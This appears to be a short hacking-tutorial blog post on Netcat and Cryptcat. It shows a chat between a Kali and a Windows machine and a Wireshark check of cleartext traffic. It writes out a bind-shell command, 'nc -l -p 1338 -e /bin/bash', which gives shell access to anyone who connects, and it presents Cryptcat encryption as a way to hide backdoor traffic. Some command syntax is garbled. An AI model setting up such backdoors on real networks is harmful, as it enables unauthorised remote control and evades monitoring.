Netcat is a well build network debugging tool, which can read and write data across computers using TCP or UDP, it is also called as TCP/IP utilities.
It is capable to act as master and slave to do file transfer, TCP banner grabbing, backdoor shells, port scanner, port redirection and network chats can also be performed using Netcat.
- Execute Command: nc -l -p 1338 -e /bin/bash
- Above listener will be listening via port 1338 and gives executable -e for anyone for shell access through /bin/bash
- Now, Kali Linux as a backdoor to your network.
- Execute Command on Windows Machine :nc.exe <Kali linux Ip> <listening port >
- Above illustrated image shows the windows machine or any client accessing and controlling kali machine via Linux commands.
- Execute Command in Kali Linux: nc -l -p 1337.
- Above command, TCP session will be established to receive packets from any IP which connects to port 1337 & now your own private messenger is ready.
- Execute Command in windows machine : nc.exe <listener Ip address or Kali linux Ip>
- Above image illustrate listener over 443 port & chat begins !!!
- Here both client and server are started chatting using netcat. For More Functions & Commands Refer Here
Note: Conversations between Kali Linux and windows machine are encrypted or not ???? Let us check with Wireshark!
Wireshark(packet capture Tool):-
- OOPS !!!! Follow TCP Stream in Wireshark captures connections & clear text messages.OMG !
- Anyone in your network can use Wireshark to see these activities.
- But Still, we have an idea to overcome this issues.Let’s use ciphers!
- Cryptcat has an advanced feature like using ciphers to encrypt clear text communication.
- Cryptcat uses end to end encryption using Two-Fish encryption algorithm
- Above comment executed : cryptcat -<lisener> <port> 8000
- Cryptcat Commands will be same as netcat
- Performed backdooring using Cryptcat, let’s check out the below Image of chat session using Cryptcat.
- So, we can see cryptcat encrypts the connection.Its most secure way of backdooring.Netcat is acquired by Nmap project and named as Ncat which supports SSL over Traffic.Cats are always Different.Happy Hacking !!!